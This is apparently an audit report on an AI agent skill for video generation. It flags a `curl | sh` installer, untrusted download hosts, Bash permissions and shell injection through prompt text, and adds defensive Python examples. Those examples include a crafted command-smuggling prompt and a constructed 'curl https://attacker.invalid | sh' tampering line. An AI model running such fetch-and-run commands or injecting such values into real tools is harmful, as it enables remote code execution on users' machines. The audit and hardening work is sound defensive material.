ai-video-generation
Fail
Audited by Gen Agent Trust Hub on Mar 4, 2026
Risk Level: CRITICAL
Findings: REMOTE_CODE_EXECUTION, EXTERNAL_DOWNLOADS, COMMAND_EXECUTION, PROMPT_INJECTION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill directs users to run `curl -fsSL https://cli.inference.sh | sh`. Piping a remote script straight into a shell executes whatever the server (or anything able to alter the response in transit) returns, with the user's privileges, with no integrity check and no opportunity to review the script before it runs.
- [EXTERNAL_DOWNLOADS]: During installation and operation of the `infsh` tool, the skill downloads binaries and configuration files from `dist.inference.sh` and `cli.inference.sh`. These domains are not recognized as trusted sources or well-known services.
- [COMMAND_EXECUTION]: The skill requests permission to use the Bash tool to run `infsh` commands. This grants the agent the ability to interact with the local operating system, file system and network through the installed CLI utility.
- [PROMPT_INJECTION]: The skill is susceptible to indirect prompt injection because it interpolates user-provided text directly into the command-line arguments of the `infsh` tool.
  - Ingestion points: user-provided strings (e.g. video prompts) are placed into the `--input` JSON payload of the `infsh app run` command, as shown in the `SKILL.md` examples.
  - Boundary markers: no boundary markers or delimiters are defined to isolate user input from the shell command structure.
  - Capability inventory: the skill has Bash execution privileges, which can be exploited if a malicious prompt escapes the intended JSON structure and the surrounding shell quoting to run additional shell commands.
  - Sanitization: the skill has no sanitization or validation logic to escape special characters or filter shell metacharacters from user input before execution.
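The escape described in the PROMPT_INJECTION finding, as an added example that is not code from the audit or from the inference.sh skill. It places the unsafe pattern (a prompt interpolated into a Bash command line whose `--input` argument carries JSON) next to a hardened form (argv list, no shell, payload built with `json.dumps`), and tokenises the unsafe command the way a POSIX shell would to show whether a crafted prompt breaks out. The app identifier, the constructed prompts and the exact flag layout are assumptions; only `infsh app run` and `--input` come from the audit text.

```python
"""Added example: unsafe vs. hardened construction of an `infsh app run` command.
Not the skill's own code; app name and prompts are constructed for illustration."""
import json
import shlex
import subprocess
from typing import List, Optional

APP_NAME = "example/text-to-video"      # ASSUMPTION: placeholder app identifier
BENIGN_PROMPT = "a cat surfing at sunset"   # constructed sample input
# Constructed attack string: closes the JSON string and the single-quoted
# shell argument, runs `id`, then re-opens a quote so the rest still parses.
MALICIOUS_PROMPT = "x'; id; echo '"


def build_command_unsafe(prompt: str) -> str:
    """The pattern the audit flags: prompt text dropped into a shell string
    that the agent then hands to the Bash tool."""
    return f"infsh app run {APP_NAME} --input '{{\"prompt\": \"{prompt}\"}}'"


def build_command_safe(prompt: str) -> List[str]:
    """Hardened form: an argv list (no shell parses it) and a JSON payload
    built by json.dumps, so quotes, semicolons and newlines in the prompt
    stay inside one argument and inside one JSON string."""
    payload = json.dumps({"prompt": prompt}, ensure_ascii=False)
    return ["infsh", "app", "run", APP_NAME, "--input", payload]


def shell_tokens(command: str) -> List[str]:
    """Tokenise like a POSIX shell, with ; & | ( ) < > as separate tokens,
    to see what Bash would actually execute for the unsafe string."""
    lex = shlex.shlex(command, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return list(lex)


def parse_input_payload(argv: List[str]) -> Optional[dict]:
    """Return the JSON object following --input, or None if it does not parse."""
    try:
        return json.loads(argv[argv.index("--input") + 1])
    except (ValueError, IndexError):
        return None


def prompt_escapes_json(prompt: str) -> bool:
    """True when the prompt breaks out of the --input argument in the unsafe
    form: the shell would see more than one command, or the payload is no
    longer valid JSON carrying the original prompt."""
    tokens = shell_tokens(build_command_unsafe(prompt))
    if any(t in (";", "&", "|", "&&", "||", "(", ")") for t in tokens):
        return True
    payload = parse_input_payload(tokens)
    return payload is None or payload.get("prompt") != prompt


def run_safe(prompt: str, dry_run: bool = True) -> List[str]:
    """Build the hardened argv; only invoke infsh when dry_run is False
    (requires the CLI to be installed). No shell is involved either way."""
    argv = build_command_safe(prompt)
    if not dry_run:
        subprocess.run(argv, check=True)
    return argv


if __name__ == "__main__":
    for p in (BENIGN_PROMPT, MALICIOUS_PROMPT):
        print("unsafe tokens:", shell_tokens(build_command_unsafe(p)))
        print("escapes:", prompt_escapes_json(p))
        print("safe argv:  ", run_safe(p))
```

The hardened form closes the shell and JSON boundary only. It does not address the indirect side of the finding: if the prompt text originates from an untrusted document the agent read, the model can still be steered into sending that text to `infsh`, so the agent's permission to run the tool at all is the control that matters most.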
Recommendations
- HIGH: Downloads and executes remote code from https://cli.inference.sh. DO NOT USE without thorough review.
- AI detected serious security threats
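The review the HIGH recommendation asks for needs the installer as a file rather than a stream. The following is an added example, not code from the audit or from inference.sh: it saves the installer instead of piping it into `sh`, pins its SHA-256, and runs it only on a match, so a tampered or truncated download is refused rather than executed. The expected digest is a placeholder the operator must obtain out of band (the audited page publishes none), the download helper is an assumption that the test does not exercise, and the sample script and tampering are constructed.

```python
"""Added example: download, pin, inspect, then run, instead of `curl ... | sh`.
Not inference.sh's own tooling; EXPECTED_SHA256 is a placeholder."""
import hashlib
import hmac
import subprocess
import tempfile
import urllib.request
from pathlib import Path
from typing import List

INSTALLER_URL = "https://cli.inference.sh"          # from the audited skill
EXPECTED_SHA256 = "REPLACE_WITH_PUBLISHED_SHA256"   # ASSUMPTION: obtain out of band


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def fetch_to_file(url: str, dest: Path) -> Path:
    """Save the script to disk. A truncated transfer then shows up as a
    digest mismatch instead of a half-executed script. (Network; not run
    by the offline check below.)"""
    with urllib.request.urlopen(url, timeout=30) as resp:
        dest.write_bytes(resp.read())
    return dest


def verify_artifact(path: Path, expected_sha256: str) -> bool:
    return hmac.compare_digest(sha256_of(path), expected_sha256.lower())


def run_if_verified(path: Path, expected_sha256: str, runner=subprocess.run) -> bool:
    """Execute the saved script only if its digest matches the pinned value.
    Returns True when it ran, False when it was refused."""
    if not verify_artifact(path, expected_sha256):
        return False
    runner(["sh", str(path)], check=True)
    return True


def self_check() -> dict:
    """Offline demonstration on a constructed script: the intact copy runs,
    a tampered copy is refused and the runner is never invoked for it."""
    calls: List[List[str]] = []

    def recording_runner(argv, check=True):
        calls.append(list(argv))

    script = b"#!/bin/sh\necho 'constructed sample installer'\n"
    expected = sha256_hex(script)
    with tempfile.TemporaryDirectory() as tmp:
        intact = Path(tmp) / "install.sh"
        intact.write_bytes(script)
        tampered = Path(tmp) / "install-tampered.sh"
        tampered.write_bytes(script + b"curl https://attacker.invalid | sh\n")  # constructed
        ran_intact = run_if_verified(intact, expected, runner=recording_runner)
        ran_tampered = run_if_verified(tampered, expected, runner=recording_runner)
    return {
        "intact_executed": ran_intact,
        "tampered_executed": ran_tampered,
        "runner_calls": len(calls),
    }


if __name__ == "__main__":
    print(self_check())
```

Pinning a digest only helps when the publisher provides one through a channel independent of the download host; absent that, saving the file and reading it before running it is the minimum the recommendation calls for, and the digest recorded at review time at least prevents a later silent change.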
Audit Metadata